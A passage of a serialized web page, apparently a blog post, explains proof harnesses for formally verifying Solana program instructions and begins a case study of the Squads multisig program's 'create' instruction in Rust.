",{"type":28,"tag":98,"props":21921,"children":21923},{"className":21922},[3652,3653],[21924],{"type":28,"tag":116,"props":21925,"children":21927},{"className":21926},[3658],[21928],{"type":28,"tag":116,"props":21929,"children":21931},{"className":21930,"ariaHidden":3664},[3663],[21932,21969,22001],{"type":28,"tag":116,"props":21933,"children":21935},{"className":21934},[3669],[21936,21940,21945,21950,21955,21959,21965],{"type":28,"tag":116,"props":21937,"children":21939},{"className":21938,"style":3780},[3674],[],{"type":28,"tag":116,"props":21941,"children":21943},{"className":21942},[21380],[21944],{"type":33,"value":313},{"type":28,"tag":116,"props":21946,"children":21948},{"className":21947,"style":21252},[3680,21251],[21949],{"type":33,"value":21255},{"type":28,"tag":116,"props":21951,"children":21953},{"className":21952},[3680],[21954],{"type":33,"value":353},{"type":28,"tag":116,"props":21956,"children":21958},{"className":21957,"style":3760},[3759],[],{"type":28,"tag":116,"props":21960,"children":21962},{"className":21961},[3765],[21963],{"type":33,"value":21964},"∧",{"type":28,"tag":116,"props":21966,"children":21968},{"className":21967,"style":3760},[3759],[],{"type":28,"tag":116,"props":21970,"children":21972},{"className":21971},[3669],[21973,21977,21982,21987,21991,21997],{"type":28,"tag":116,"props":21974,"children":21976},{"className":21975,"style":3780},[3674],[],{"type":28,"tag":116,"props":21978,"children":21980},{"className":21979,"style":21782},[3680,21251],[21981],{"type":33,"value":21785},{"type":28,"tag":116,"props":21983,"children":21985},{"className":21984},[21401],[21986],{"type":33,"value":1829},{"type":28,"tag":116,"props":21988,"children":21990},{"className":21989,"style":3857},[3759],[],{"type":28,"tag":116,"props":21992,"children":21994},{"className":21993},[3862],[21995],{"type":33,"value":21996},"→",{"type":28,"tag":116,"props":21998,"children":22000},{"className":21999,"style":3857},[3759],[],{"type":28,"tag":116,"props":22002,"children":22004},{"className":22003},[3669],[22005,22009,22014],{"type":28,"tag":116,"props":22006,"children":22008},{"className":22007,"style":21246},[3674],[],{"type":28,"tag":116,"props":22010,"children":22012},{"className":22011,"style":21252},[3680,21251],[22013],{"type":33,"value":21255},{"type":28,"tag":116,"props":22015,"children":22017},{"className":22016},[3680],[22018],{"type":33,"value":1824},{"type":28,"tag":29,"props":22020,"children":22021},{},[22022],{"type":33,"value":22023},"We can construct a proof harness like the following:",{"type":28,"tag":234,"props":22025,"children":22027},{"code":22026,"language":19124,"meta":7,"className":19125,"style":7},"assume(P0)\nres = instruction_handler(...)\nassert(!K || P1)\n",[22028],{"type":28,"tag":98,"props":22029,"children":22030},{"__ignoreMap":7},[22031,22039,22056],{"type":28,"tag":116,"props":22032,"children":22033},{"class":245,"line":246},[22034],{"type":28,"tag":116,"props":22035,"children":22036},{"style":266},[22037],{"type":33,"value":22038},"assume(P0)\n",{"type":28,"tag":116,"props":22040,"children":22041},{"class":245,"line":256},[22042,22047,22051],{"type":28,"tag":116,"props":22043,"children":22044},{"style":266},[22045],{"type":33,"value":22046},"res ",{"type":28,"tag":116,"props":22048,"children":22049},{"style":370},[22050],{"type":33,"value":373},{"type":28,"tag":116,"props":22052,"children":22053},{"style":266},[22054],{"type":33,"value":22055}," instruction_handler(...)\n",{"type":28,"tag":116,"props":22057,"children":22058},{"class":245,"line":293},[22059,22063,22067,22072,22077,22082],{"type":28,"tag":116,"props":22060,"children":22061},{"style":260},[22062],{"type":33,"value":19648},{"type":28,"tag":116,"props":22064,"children":22065},{"style":266},[22066],{"type":33,"value":313},{"type":28,"tag":116,"props":22068,"children":22070},{"style":22069},"--shiki-default:#F44747",[22071],{"type":33,"value":20285},{"type":28,"tag":116,"props":22073,"children":22074},{"style":266},[22075],{"type":33,"value":22076},"K ",{"type":28,"tag":116,"props":22078,"children":22079},{"style":22069},[22080],{"type":33,"value":22081},"||",{"type":28,"tag":116,"props":22083,"children":22084},{"style":266},[22085],{"type":33,"value":22086}," P1)\n",{"type":28,"tag":29,"props":22088,"children":22089},{},[22090],{"type":33,"value":22091},"By itself, this harness doesn't actually prove much. For example, if the instruction fails every time, this proof will still work. However, in conjunction with the two subsequent proofs we can be assured that the instruction will actually succeed when we expect it to.",{"type":28,"tag":75,"props":22093,"children":22095},{"id":22094},"positive-instruction-invariant",[22096],{"type":33,"value":22097},"Positive instruction invariant",{"type":28,"tag":29,"props":22099,"children":22100},{},[22101,22103,22109,22111,22162],{"type":33,"value":22102},"Next we need to prove that ",{"type":28,"tag":98,"props":22104,"children":22106},{"className":22105},[],[22107],{"type":33,"value":22108},"success_if",{"type":33,"value":22110}," is a sufficient condition for instruction success. I.e. ",{"type":28,"tag":98,"props":22112,"children":22114},{"className":22113},[3652,3653],[22115],{"type":28,"tag":116,"props":22116,"children":22118},{"className":22117},[3658],[22119],{"type":28,"tag":116,"props":22120,"children":22122},{"className":22121,"ariaHidden":3664},[3663],[22123,22149],{"type":28,"tag":116,"props":22124,"children":22126},{"className":22125},[3669],[22127,22131,22136,22140,22145],{"type":28,"tag":116,"props":22128,"children":22130},{"className":22129,"style":21246},[3674],[],{"type":28,"tag":116,"props":22132,"children":22134},{"className":22133,"style":21709},[3680,21251],[22135],{"type":33,"value":21712},{"type":28,"tag":116,"props":22137,"children":22139},{"className":22138,"style":3857},[3759],[],{"type":28,"tag":116,"props":22141,"children":22143},{"className":22142},[3862],[22144],{"type":33,"value":21996},{"type":28,"tag":116,"props":22146,"children":22148},{"className":22147,"style":3857},[3759],[],{"type":28,"tag":116,"props":22150,"children":22152},{"className":22151},[3669],[22153,22157],{"type":28,"tag":116,"props":22154,"children":22156},{"className":22155,"style":21246},[3674],[],{"type":28,"tag":116,"props":22158,"children":22160},{"className":22159,"style":21782},[3680,21251],[22161],{"type":33,"value":21785},{"type":33,"value":141},{"type":28,"tag":29,"props":22164,"children":22165},{},[22166],{"type":33,"value":22167},"Just like before we can construct a proof harness:",{"type":28,"tag":234,"props":22169,"children":22171},{"code":22170,"language":19124,"meta":7,"className":19125,"style":7},"assume(S)\nres = instruction_handler(...)\nassert(K)\n",[22172],{"type":28,"tag":98,"props":22173,"children":22174},{"__ignoreMap":7},[22175,22183,22198],{"type":28,"tag":116,"props":22176,"children":22177},{"class":245,"line":246},[22178],{"type":28,"tag":116,"props":22179,"children":22180},{"style":266},[22181],{"type":33,"value":22182},"assume(S)\n",{"type":28,"tag":116,"props":22184,"children":22185},{"class":245,"line":256},[22186,22190,22194],{"type":28,"tag":116,"props":22187,"children":22188},{"style":266},[22189],{"type":33,"value":22046},{"type":28,"tag":116,"props":22191,"children":22192},{"style":370},[22193],{"type":33,"value":373},{"type":28,"tag":116,"props":22195,"children":22196},{"style":266},[22197],{"type":33,"value":22055},{"type":28,"tag":116,"props":22199,"children":22200},{"class":245,"line":293},[22201,22205],{"type":28,"tag":116,"props":22202,"children":22203},{"style":260},[22204],{"type":33,"value":19648},{"type":28,"tag":116,"props":22206,"children":22207},{"style":266},[22208],{"type":33,"value":22209},"(K)\n",{"type":28,"tag":29,"props":22211,"children":22212},{},[22213,22215,22220,22222,22234],{"type":33,"value":22214},"This proof assures that whenever ",{"type":28,"tag":98,"props":22216,"children":22218},{"className":22217},[],[22219],{"type":33,"value":19818},{"type":33,"value":22221}," is satisfied, the instruction will succeed. However, remember that since this is not a biconditional, the instruction may also succeed ",{"type":28,"tag":2583,"props":22223,"children":22224},{},[22225,22227,22232],{"type":33,"value":22226},"even if ",{"type":28,"tag":98,"props":22228,"children":22230},{"className":22229},[],[22231],{"type":33,"value":19818},{"type":33,"value":22233}," is not satisfied",{"type":33,"value":22235},". To specify explicit error conditions we need our third and final proof.",{"type":28,"tag":75,"props":22237,"children":22239},{"id":22238},"_3-negative-instruction-invariant",[22240],{"type":33,"value":22241},"3. Negative instruction invariant",{"type":28,"tag":29,"props":22243,"children":22244},{},[22245,22247,22252,22254,22310],{"type":33,"value":22246},"Finally, we want to prove that ",{"type":28,"tag":98,"props":22248,"children":22250},{"className":22249},[],[22251],{"type":33,"value":19825},{"type":33,"value":22253}," is a sufficient condition for instruction failure. I.e. ",{"type":28,"tag":98,"props":22255,"children":22257},{"className":22256},[3652,3653],[22258],{"type":28,"tag":116,"props":22259,"children":22261},{"className":22260},[3658],[22262],{"type":28,"tag":116,"props":22263,"children":22265},{"className":22264,"ariaHidden":3664},[3663],[22266,22292],{"type":28,"tag":116,"props":22267,"children":22269},{"className":22268},[3669],[22270,22274,22279,22283,22288],{"type":28,"tag":116,"props":22271,"children":22273},{"className":22272,"style":21246},[3674],[],{"type":28,"tag":116,"props":22275,"children":22277},{"className":22276,"style":21709},[3680,21251],[22278],{"type":33,"value":21747},{"type":28,"tag":116,"props":22280,"children":22282},{"className":22281,"style":3857},[3759],[],{"type":28,"tag":116,"props":22284,"children":22286},{"className":22285},[3862],[22287],{"type":33,"value":21996},{"type":28,"tag":116,"props":22289,"children":22291},{"className":22290,"style":3857},[3759],[],{"type":28,"tag":116,"props":22293,"children":22295},{"className":22294},[3669],[22296,22300,22305],{"type":28,"tag":116,"props":22297,"children":22299},{"className":22298,"style":21246},[3674],[],{"type":28,"tag":116,"props":22301,"children":22303},{"className":22302},[3680],[22304],{"type":33,"value":21843},{"type":28,"tag":116,"props":22306,"children":22308},{"className":22307,"style":21782},[3680,21251],[22309],{"type":33,"value":21785},{"type":33,"value":141},{"type":28,"tag":29,"props":22312,"children":22313},{},[22314],{"type":33,"value":22315},"This harness looks just like the previous one:",{"type":28,"tag":234,"props":22317,"children":22319},{"code":22318,"language":19124,"meta":7,"className":19125,"style":7},"assume(E)\nres = instruction_handler(...)\nassert(!K)\n",[22320],{"type":28,"tag":98,"props":22321,"children":22322},{"__ignoreMap":7},[22323,22331,22346],{"type":28,"tag":116,"props":22324,"children":22325},{"class":245,"line":246},[22326],{"type":28,"tag":116,"props":22327,"children":22328},{"style":266},[22329],{"type":33,"value":22330},"assume(E)\n",{"type":28,"tag":116,"props":22332,"children":22333},{"class":245,"line":256},[22334,22338,22342],{"type":28,"tag":116,"props":22335,"children":22336},{"style":266},[22337],{"type":33,"value":22046},{"type":28,"tag":116,"props":22339,"children":22340},{"style":370},[22341],{"type":33,"value":373},{"type":28,"tag":116,"props":22343,"children":22344},{"style":266},[22345],{"type":33,"value":22055},{"type":28,"tag":116,"props":22347,"children":22348},{"class":245,"line":293},[22349,22353,22357,22361],{"type":28,"tag":116,"props":22350,"children":22351},{"style":260},[22352],{"type":33,"value":19648},{"type":28,"tag":116,"props":22354,"children":22355},{"style":266},[22356],{"type":33,"value":313},{"type":28,"tag":116,"props":22358,"children":22359},{"style":22069},[22360],{"type":33,"value":20285},{"type":28,"tag":116,"props":22362,"children":22363},{"style":266},[22364],{"type":33,"value":22365},"K)\n",{"type":28,"tag":29,"props":22367,"children":22368},{},[22369,22371,22375],{"type":33,"value":22370},"With these three harnesses, we are now able to formally verify that instructions succeed or fail when we expect them to ",{"type":28,"tag":2583,"props":22372,"children":22373},{},[22374],{"type":33,"value":16033},{"type":33,"value":22376}," the account invariants we expect are always being preserved.",{"type":28,"tag":63,"props":22378,"children":22380},{"id":22379},"case-study-squads-multisig",[22381],{"type":33,"value":22382},"Case study: Squads Multisig",{"type":28,"tag":29,"props":22384,"children":22385},{},[22386,22388,22393],{"type":33,"value":22387},"During our research, we focused on formally verifying aspects of the ",{"type":28,"tag":87,"props":22389,"children":22391},{"href":18488,"rel":22390},[91],[22392],{"type":33,"value":18492},{"type":33,"value":141},{"type":28,"tag":29,"props":22395,"children":22396},{},[22397,22399,22405,22407,22413],{"type":33,"value":22398},"The program defines a Multisig account (",{"type":28,"tag":98,"props":22400,"children":22402},{"className":22401},[],[22403],{"type":33,"value":22404},"Ms",{"type":33,"value":22406},") which has multiple members. These members can propose and then vote on transactions to execute on behalf of the multisig. If at least some ",{"type":28,"tag":98,"props":22408,"children":22410},{"className":22409},[],[22411],{"type":33,"value":22412},"threshold",{"type":33,"value":22414}," of members vote yes, the transaction will be invoked. Additionally, there is functionality to add/remove users and update the threshold.",{"type":28,"tag":29,"props":22416,"children":22417},{},[22418],{"type":33,"value":22419},"In practice, this structure provides a useful way to distribute authority across a group of individuals. From a formal verification perspective, it has both stateless and stateful features and constraints that provided a good testbed for our tooling.",{"type":28,"tag":29,"props":22421,"children":22422},{},[22423],{"type":33,"value":22424},"In this section we will go through a few examples of properties that we can verify on this program:",{"type":28,"tag":455,"props":22426,"children":22427},{},[22428,22433,22438,22443],{"type":28,"tag":459,"props":22429,"children":22430},{},[22431],{"type":33,"value":22432},"Incrementally verifying minimum requirements to create a multisig",{"type":28,"tag":459,"props":22434,"children":22435},{},[22436],{"type":33,"value":22437},"Verify threshold requirements",{"type":28,"tag":459,"props":22439,"children":22440},{},[22441],{"type":33,"value":22442},"Verify requirements to remove a member",{"type":28,"tag":459,"props":22444,"children":22445},{},[22446],{"type":33,"value":22447},"Safety guarantees",{"type":28,"tag":75,"props":22449,"children":22451},{"id":22450},"_1-incrementally-verifying-minimum-requirements-to-create-a-multisig",[22452],{"type":33,"value":22453},"1. Incrementally verifying minimum requirements to create a multisig",{"type":28,"tag":29,"props":22455,"children":22456},{},[22457,22459,22464],{"type":33,"value":22458},"Suppose we want to verify the minimum requirements to create a multisig, i.e. the ",{"type":28,"tag":98,"props":22460,"children":22462},{"className":22461},[],[22463],{"type":33,"value":19818},{"type":33,"value":22465}," expression.",{"type":28,"tag":29,"props":22467,"children":22468},{},[22469,22471,22476,22478,22484],{"type":33,"value":22470},"Creating a multisig (",{"type":28,"tag":98,"props":22472,"children":22474},{"className":22473},[],[22475],{"type":33,"value":22404},{"type":33,"value":22477},") requires invoking the ",{"type":28,"tag":98,"props":22479,"children":22481},{"className":22480},[],[22482],{"type":33,"value":22483},"create",{"type":33,"value":22485}," instruction:",{"type":28,"tag":234,"props":22487,"children":22489},{"code":22488,"language":2651,"meta":7,"className":2652,"style":7},"#[derive(Accounts)]\n#[instruction(threshold: u16, create_key: Pubkey, members: Vec\u003CPubkey>)]\npub struct Create\u003C'info> {\n    #[account(\n        init,\n        payer = creator,\n        space = Ms::SIZE_WITHOUT_MEMBERS + (members.len() * 32),\n        seeds = [b\"squad\", create_key.as_ref(), b\"multisig\"], bump\n    )]\n    pub multisig: Account\u003C'info, Ms>,\n\n    #[account(mut)]\n    pub creator: Signer\u003C'info>,\n    pub system_program: Program\u003C'info, System>,\n}\n\npub fn create(\n    ctx: Context\u003CCreate>,\n    threshold: u16,\n    create_key: Pubkey,\n    members: Vec\u003CPubkey>,\n) -> Result\u003C()> {\n    // sort the members and remove duplicates\n    let mut members = members;\n    members.sort();\n    members.dedup();\n\n    // check we don't exceed u16\n    let total_members = members.len();\n    if total_members \u003C 1 {\n        return err!(MsError::EmptyMembers);\n    }\n\n    // make sure we don't exceed u16 on first call\n    if total_members > usize::from(u16::MAX) {\n        return err!(MsError::MaxMembersReached);\n    }\n\n    // make sure threshold is valid\n    if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n        return err!(MsError::InvalidThreshold);\n    }\n\n    ctx.accounts.multisig.init(\n        threshold,\n        create_key,\n        members,\n        *ctx.bumps.get(\"multisig\").unwrap(),\n    )\n}\n",[22490],{"type":28,"tag":98,"props":22491,"children":22492},{"__ignoreMap":7},[22493,22510,22565,22595,22603,22611,22628,22679,22729,22737,22778,22785,22801,22834,22876,22883,22890,22909,22937,22957,22977,23005,23024,23032,23060,23080,23100,23107,23115,23147,23170,23204,23211,23218,23226,23267,23299,23306,23313,23321,23396,23428,23435,23442,23478,23490,23502,23514,23567,23575],{"type":28,"tag":116,"props":22494,"children":22495},{"class":245,"line":246},[22496,22501,22506],{"type":28,"tag":116,"props":22497,"children":22498},{"style":266},[22499],{"type":33,"value":22500},"#[derive(",{"type":28,"tag":116,"props":22502,"children":22503},{"style":339},[22504],{"type":33,"value":22505},"Accounts",{"type":28,"tag":116,"props":22507,"children":22508},{"style":266},[22509],{"type":33,"value":19922},{"type":28,"tag":116,"props":22511,"children":22512},{"class":245,"line":256},[22513,22518,22522,22526,22531,22535,22539,22544,22548,22552,22556,22560],{"type":28,"tag":116,"props":22514,"children":22515},{"style":266},[22516],{"type":33,"value":22517},"#[instruction(threshold",{"type":28,"tag":116,"props":22519,"children":22520},{"style":370},[22521],{"type":33,"value":4160},{"type":28,"tag":116,"props":22523,"children":22524},{"style":339},[22525],{"type":33,"value":20693},{"type":28,"tag":116,"props":22527,"children":22528},{"style":266},[22529],{"type":33,"value":22530},", create_key",{"type":28,"tag":116,"props":22532,"children":22533},{"style":370},[22534],{"type":33,"value":4160},{"type":28,"tag":116,"props":22536,"children":22537},{"style":339},[22538],{"type":33,"value":20520},{"type":28,"tag":116,"props":22540,"children":22541},{"style":266},[22542],{"type":33,"value":22543},", members",{"type":28,"tag":116,"props":22545,"children":22546},{"style":370},[22547],{"type":33,"value":4160},{"type":28,"tag":116,"props":22549,"children":22550},{"style":339},[22551],{"type":33,"value":21052},{"type":28,"tag":116,"props":22553,"children":22554},{"style":266},[22555],{"type":33,"value":514},{"type":28,"tag":116,"props":22557,"children":22558},{"style":339},[22559],{"type":33,"value":21061},{"type":28,"tag":116,"props":22561,"children":22562},{"style":266},[22563],{"type":33,"value":22564},">)]\n",{"type":28,"tag":116,"props":22566,"children":22567},{"class":245,"line":293},[22568,22572,22576,22581,22586,22591],{"type":28,"tag":116,"props":22569,"children":22570},{"style":376},[22571],{"type":33,"value":13356},{"type":28,"tag":116,"props":22573,"children":22574},{"style":376},[22575],{"type":33,"value":20814},{"type":28,"tag":116,"props":22577,"children":22578},{"style":339},[22579],{"type":33,"value":22580}," Create",{"type":28,"tag":116,"props":22582,"children":22583},{"style":266},[22584],{"type":33,"value":22585},"\u003C'",{"type":28,"tag":116,"props":22587,"children":22588},{"style":339},[22589],{"type":33,"value":22590},"info",{"type":28,"tag":116,"props":22592,"children":22593},{"style":266},[22594],{"type":33,"value":6952},{"type":28,"tag":116,"props":22596,"children":22597},{"class":245,"line":361},[22598],{"type":28,"tag":116,"props":22599,"children":22600},{"style":266},[22601],{"type":33,"value":22602},"    #[account(\n",{"type":28,"tag":116,"props":22604,"children":22605},{"class":245,"line":387},[22606],{"type":28,"tag":116,"props":22607,"children":22608},{"style":266},[22609],{"type":33,"value":22610},"        init,\n",{"type":28,"tag":116,"props":22612,"children":22613},{"class":245,"line":400},[22614,22619,22623],{"type":28,"tag":116,"props":22615,"children":22616},{"style":266},[22617],{"type":33,"value":22618},"        payer ",{"type":28,"tag":116,"props":22620,"children":22621},{"style":370},[22622],{"type":33,"value":373},{"type":28,"tag":116,"props":22624,"children":22625},{"style":266},[22626],{"type":33,"value":22627}," creator,\n",{"type":28,"tag":116,"props":22629,"children":22630},{"class":245,"line":614},[22631,22636,22640,22644,22648,22653,22657,22662,22666,22670,22674],{"type":28,"tag":116,"props":22632,"children":22633},{"style":266},[22634],{"type":33,"value":22635},"        space ",{"type":28,"tag":116,"props":22637,"children":22638},{"style":370},[22639],{"type":33,"value":373},{"type":28,"tag":116,"props":22641,"children":22642},{"style":339},[22643],{"type":33,"value":20819},{"type":28,"tag":116,"props":22645,"children":22646},{"style":370},[22647],{"type":33,"value":3151},{"type":28,"tag":116,"props":22649,"children":22650},{"style":339},[22651],{"type":33,"value":22652},"SIZE_WITHOUT_MEMBERS",{"type":28,"tag":116,"props":22654,"children":22655},{"style":370},[22656],{"type":33,"value":2258},{"type":28,"tag":116,"props":22658,"children":22659},{"style":266},[22660],{"type":33,"value":22661}," (members",{"type":28,"tag":116,"props":22663,"children":22664},{"style":370},[22665],{"type":33,"value":141},{"type":28,"tag":116,"props":22667,"children":22668},{"style":266},[22669],{"type":33,"value":20684},{"type":28,"tag":116,"props":22671,"children":22672},{"style":370},[22673],{"type":33,"value":4240},{"type":28,"tag":116,"props":22675,"children":22676},{"style":266},[22677],{"type":33,"value":22678}," 32),\n",{"type":28,"tag":116,"props":22680,"children":22681},{"class":245,"line":631},[22682,22687,22691,22696,22701,22705,22709,22714,22719,22724],{"type":28,"tag":116,"props":22683,"children":22684},{"style":266},[22685],{"type":33,"value":22686},"        seeds ",{"type":28,"tag":116,"props":22688,"children":22689},{"style":370},[22690],{"type":33,"value":373},{"type":28,"tag":116,"props":22692,"children":22693},{"style":266},[22694],{"type":33,"value":22695}," [",{"type":28,"tag":116,"props":22697,"children":22698},{"style":563},[22699],{"type":33,"value":22700},"b\"squad\"",{"type":28,"tag":116,"props":22702,"children":22703},{"style":266},[22704],{"type":33,"value":22530},{"type":28,"tag":116,"props":22706,"children":22707},{"style":370},[22708],{"type":33,"value":141},{"type":28,"tag":116,"props":22710,"children":22711},{"style":266},[22712],{"type":33,"value":22713},"as_ref(), ",{"type":28,"tag":116,"props":22715,"children":22716},{"style":563},[22717],{"type":33,"value":22718},"b\"multisig\"",{"type":28,"tag":116,"props":22720,"children":22721},{"style":266},[22722],{"type":33,"value":22723},"], ",{"type":28,"tag":116,"props":22725,"children":22726},{"style":272},[22727],{"type":33,"value":22728},"bump\n",{"type":28,"tag":116,"props":22730,"children":22731},{"class":245,"line":665},[22732],{"type":28,"tag":116,"props":22733,"children":22734},{"style":266},[22735],{"type":33,"value":22736},"    )]\n",{"type":28,"tag":116,"props":22738,"children":22739},{"class":245,"line":713},[22740,22744,22749,22753,22758,22762,22766,22770,22774],{"type":28,"tag":116,"props":22741,"children":22742},{"style":376},[22743],{"type":33,"value":20506},{"type":28,"tag":116,"props":22745,"children":22746},{"style":272},[22747],{"type":33,"value":22748}," multisig",{"type":28,"tag":116,"props":22750,"children":22751},{"style":370},[22752],{"type":33,"value":4160},{"type":28,"tag":116,"props":22754,"children":22755},{"style":339},[22756],{"type":33,"value":22757}," Account",{"type":28,"tag":116,"props":22759,"children":22760},{"style":266},[22761],{"type":33,"value":22585},{"type":28,"tag":116,"props":22763,"children":22764},{"style":339},[22765],{"type":33,"value":22590},{"type":28,"tag":116,"props":22767,"children":22768},{"style":266},[22769],{"type":33,"value":825},{"type":28,"tag":116,"props":22771,"children":22772},{"style":339},[22773],{"type":33,"value":22404},{"type":28,"tag":116,"props":22775,"children":22776},{"style":266},[22777],{"type":33,"value":5809},{"type":28,"tag":116,"props":22779,"children":22780},{"class":245,"line":750},[22781],{"type":28,"tag":116,"props":22782,"children":22783},{"emptyLinePlaceholder":19},[22784],{"type":33,"value":1044},{"type":28,"tag":116,"props":22786,"children":22787},{"class":245,"line":779},[22788,22793,22797],{"type":28,"tag":116,"props":22789,"children":22790},{"style":266},[22791],{"type":33,"value":22792},"    #[account(",{"type":28,"tag":116,"props":22794,"children":22795},{"style":376},[22796],{"type":33,"value":3394},{"type":28,"tag":116,"props":22798,"children":22799},{"style":266},[22800],{"type":33,"value":19922},{"type":28,"tag":116,"props":22802,"children":22803},{"class":245,"line":796},[22804,22808,22813,22817,22822,22826,22830],{"type":28,"tag":116,"props":22805,"children":22806},{"style":376},[22807],{"type":33,"value":20506},{"type":28,"tag":116,"props":22809,"children":22810},{"style":272},[22811],{"type":33,"value":22812}," creator",{"type":28,"tag":116,"props":22814,"children":22815},{"style":370},[22816],{"type":33,"value":4160},{"type":28,"tag":116,"props":22818,"children":22819},{"style":339},[22820],{"type":33,"value":22821}," Signer",{"type":28,"tag":116,"props":22823,"children":22824},{"style":266},[22825],{"type":33,"value":22585},{"type":28,"tag":116,"props":22827,"children":22828},{"style":339},[22829],{"type":33,"value":22590},{"type":28,"tag":116,"props":22831,"children":22832},{"style":266},[22833],{"type":33,"value":5809},{"type":28,"tag":116,"props":22835,"children":22836},{"class":245,"line":847},[22837,22841,22846,22850,22855,22859,22863,22867,22872],{"type":28,"tag":116,"props":22838,"children":22839},{"style":376},[22840],{"type":33,"value":20506},{"type":28,"tag":116,"props":22842,"children":22843},{"style":272},[22844],{"type":33,"value":22845}," system_program",{"type":28,"tag":116,"props":22847,"children":22848},{"style":370},[22849],{"type":33,"value":4160},{"type":28,"tag":116,"props":22851,"children":22852},{"style":339},[22853],{"type":33,"value":22854}," Program",{"type":28,"tag":116,"props":22856,"children":22857},{"style":266},[22858],{"type":33,"value":22585},{"type":28,"tag":116,"props":22860,"children":22861},{"style":339},[22862],{"type":33,"value":22590},{"type":28,"tag":116,"props":22864,"children":22865},{"style":266},[22866],{"type":33,"value":825},{"type":28,"tag":116,"props":22868,"children":22869},{"style":339},[22870],{"type":33,"value":22871},"System",{"type":28,"tag":116,"props":22873,"children":22874},{"style":266},[22875],{"type":33,"value":5809},{"type":28,"tag":116,"props":22877,"children":22878},{"class":245,"line":898},[22879],{"type":28,"tag":116,"props":22880,"children":22881},{"style":266},[22882],{"type":33,"value":406},{"type":28,"tag":116,"props":22884,"children":22885},{"class":245,"line":907},[22886],{"type":28,"tag":116,"props":22887,"children":22888},{"emptyLinePlaceholder":19},[22889],{"type":33,"value":1044},{"type":28,"tag":116,"props":22891,"children":22892},{"class":245,"line":981},[22893,22897,22901,22905],{"type":28,"tag":116,"props":22894,"children":22895},{"style":376},[22896],{"type":33,"value":13356},{"type":28,"tag":116,"props":22898,"children":22899},{"style":376},[22900],{"type":33,"value":13361},{"type":28,"tag":116,"props":22902,"children":22903},{"style":282},[22904],{"type":33,"value":6784},{"type":28,"tag":116,"props":22906,"children":22907},{"style":266},[22908],{"type":33,"value":3133},{"type":28,"tag":116,"props":22910,"children":22911},{"class":245,"line":1011},[22912,22916,22920,22924,22928,22933],{"type":28,"tag":116,"props":22913,"children":22914},{"style":272},[22915],{"type":33,"value":19887},{"type":28,"tag":116,"props":22917,"children":22918},{"style":370},[22919],{"type":33,"value":4160},{"type":28,"tag":116,"props":22921,"children":22922},{"style":339},[22923],{"type":33,"value":19953},{"type":28,"tag":116,"props":22925,"children":22926},{"style":266},[22927],{"type":33,"value":514},{"type":28,"tag":116,"props":22929,"children":22930},{"style":339},[22931],{"type":33,"value":22932},"Create",{"type":28,"tag":116,"props":22934,"children":22935},{"style":266},[22936],{"type":33,"value":5809},{"type":28,"tag":116,"props":22938,"children":22939},{"class":245,"line":1029},[22940,22945,22949,22953],{"type":28,"tag":116,"props":22941,"children":22942},{"style":272},[22943],{"type":33,"value":22944},"    threshold",{"type":28,"tag":116,"props":22946,"children":22947},{"style":370},[22948],{"type":33,"value":4160},{"type":28,"tag":116,"props":22950,"children":22951},{"style":339},[22952],{"type":33,"value":20693},{"type":28,"tag":116,"props":22954,"children":22955},{"style":266},[22956],{"type":33,"value":3178},{"type":28,"tag":116,"props":22958,"children":22959},{"class":245,"line":1038},[22960,22965,22969,22973],{"type":28,"tag":116,"props":22961,"children":22962},{"style":272},[22963],{"type":33,"value":22964},"    create_key",{"type":28,"tag":116,"props":22966,"children":22967},{"style":370},[22968],{"type":33,"value":4160},{"type":28,"tag":116,"props":22970,"children":22971},{"style":339},[22972],{"type":33,"value":20520},{"type":28,"tag":116,"props":22974,"children":22975},{"style":266},[22976],{"type":33,"value":3178},{"type":28,"tag":116,"props":22978,"children":22979},{"class":245,"line":1047},[22980,22985,22989,22993,22997,23001],{"type":28,"tag":116,"props":22981,"children":22982},{"style":272},[22983],{"type":33,"value":22984},"    members",{"type":28,"tag":116,"props":22986,"children":22987},{"style":370},[22988],{"type":33,"value":4160},{"type":28,"tag":116,"props":22990,"children":22991},{"style":339},[22992],{"type":33,"value":21052},{"type":28,"tag":116,"props":22994,"children":22995},{"style":266},[22996],{"type":33,"value":514},{"type":28,"tag":116,"props":22998,"children":22999},{"style":339},[23000],{"type":33,"value":21061},{"type":28,"tag":116,"props":23002,"children":23003},{"style":266},[23004],{"type":33,"value":5809},{"type":28,"tag":116,"props":23006,"children":23007},{"class":245,"line":1071},[23008,23012,23016,23020],{"type":28,"tag":116,"props":23009,"children":23010},{"style":266},[23011],{"type":33,"value":1609},{"type":28,"tag":116,"props":23013,"children":23014},{"style":370},[23015],{"type":33,"value":13423},{"type":28,"tag":116,"props":23017,"children":23018},{"style":339},[23019],{"type":33,"value":13428},{"type":28,"tag":116,"props":23021,"children":23022},{"style":266},[23023],{"type":33,"value":19995},{"type":28,"tag":116,"props":23025,"children":23026},{"class":245,"line":1137},[23027],{"type":28,"tag":116,"props":23028,"children":23029},{"style":250},[23030],{"type":33,"value":23031},"    // sort the members and remove duplicates\n",{"type":28,"tag":116,"props":23033,"children":23034},{"class":245,"line":1181},[23035,23039,23043,23048,23052,23056],{"type":28,"tag":116,"props":23036,"children":23037},{"style":376},[23038],{"type":33,"value":2672},{"type":28,"tag":116,"props":23040,"children":23041},{"style":376},[23042],{"type":33,"value":2677},{"type":28,"tag":116,"props":23044,"children":23045},{"style":272},[23046],{"type":33,"value":23047}," members",{"type":28,"tag":116,"props":23049,"children":23050},{"style":370},[23051],{"type":33,"value":2226},{"type":28,"tag":116,"props":23053,"children":23054},{"style":272},[23055],{"type":33,"value":23047},{"type":28,"tag":116,"props":23057,"children":23058},{"style":266},[23059],{"type":33,"value":384},{"type":28,"tag":116,"props":23061,"children":23062},{"class":245,"line":1212},[23063,23067,23071,23076],{"type":28,"tag":116,"props":23064,"children":23065},{"style":272},[23066],{"type":33,"value":22984},{"type":28,"tag":116,"props":23068,"children":23069},{"style":370},[23070],{"type":33,"value":141},{"type":28,"tag":116,"props":23072,"children":23073},{"style":282},[23074],{"type":33,"value":23075},"sort",{"type":28,"tag":116,"props":23077,"children":23078},{"style":266},[23079],{"type":33,"value":1445},{"type":28,"tag":116,"props":23081,"children":23082},{"class":245,"line":1254},[23083,23087,23091,23096],{"type":28,"tag":116,"props":23084,"children":23085},{"style":272},[23086],{"type":33,"value":22984},{"type":28,"tag":116,"props":23088,"children":23089},{"style":370},[23090],{"type":33,"value":141},{"type":28,"tag":116,"props":23092,"children":23093},{"style":282},[23094],{"type":33,"value":23095},"dedup",{"type":28,"tag":116,"props":23097,"children":23098},{"style":266},[23099],{"type":33,"value":1445},{"type":28,"tag":116,"props":23101,"children":23102},{"cl